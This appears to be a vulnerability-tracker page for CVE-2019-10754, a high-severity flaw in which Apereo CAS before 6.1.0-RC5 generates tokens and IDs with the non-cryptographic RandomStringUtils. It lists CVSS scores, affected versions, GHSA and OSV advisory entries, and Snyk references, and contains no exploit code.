CVE-2019-10754
published 2019-09-23CVE-2019-10754: Multiple classes used within Apereo CAS before release 6.1.0-RC5 makes use of apache commons-lang3 RandomStringUtils for token and ID generation which makes…
PriorityP342high8.1CVSS 3.1
AVNACLPRLUINSUCHIHAN
EPSS
1.75%
75.0th percentile
Multiple classes used within Apereo CAS before release 6.1.0-RC5 makes use of apache commons-lang3 RandomStringUtils for token and ID generation which makes them predictable due to RandomStringUtils PRNG's algorithm not being cryptographically strong.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apereo | central_authentication_service | <= 6.0.5.1 | — |
| apereo | central_authentication_service | — | — |
CVSS provenance
nvdv3.18.1HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
nvdv2.05.5MEDIUMAV:N/AC:L/Au:S/C:P/I:P/A:N
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
Use of Insufficiently Random Values in Apereo CAS
ghsa·2022-05-24
CVE-2019-10754 [HIGH] CWE-330 Use of Insufficiently Random Values in Apereo CAS
Use of Insufficiently Random Values in Apereo CAS
Multiple classes used within Apereo CAS before release 6.1.0-RC5 makes use of apache commons-lang3 RandomStringUtils for token and ID generation which makes them predictable due to RandomStringUtils PRNG's algorithm not being cryptographically strong.
OSV
Use of Insufficiently Random Values in Apereo CAS
osv·2022-05-24
CVE-2019-10754 [HIGH] Use of Insufficiently Random Values in Apereo CAS
Use of Insufficiently Random Values in Apereo CAS
Multiple classes used within Apereo CAS before release 6.1.0-RC5 makes use of apache commons-lang3 RandomStringUtils for token and ID generation which makes them predictable due to RandomStringUtils PRNG's algorithm not being cryptographically strong.
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
https://snyk.io/vuln/SNYK-JAVA-ORGAPEREOCAS-467402https://snyk.io/vuln/SNYK-JAVA-ORGAPEREOCAS-467404https://snyk.io/vuln/SNYK-JAVA-ORGAPEREOCAS-467406https://snyk.io/vuln/SNYK-JAVA-ORGAPEREOCAS-468868https://snyk.io/vuln/SNYK-JAVA-ORGAPEREOCAS-468869https://snyk.io/vuln/SNYK-JAVA-ORGAPEREOCAS-467402https://snyk.io/vuln/SNYK-JAVA-ORGAPEREOCAS-467404https://snyk.io/vuln/SNYK-JAVA-ORGAPEREOCAS-467406https://snyk.io/vuln/SNYK-JAVA-ORGAPEREOCAS-468868https://snyk.io/vuln/SNYK-JAVA-ORGAPEREOCAS-468869
2019-09-23
Published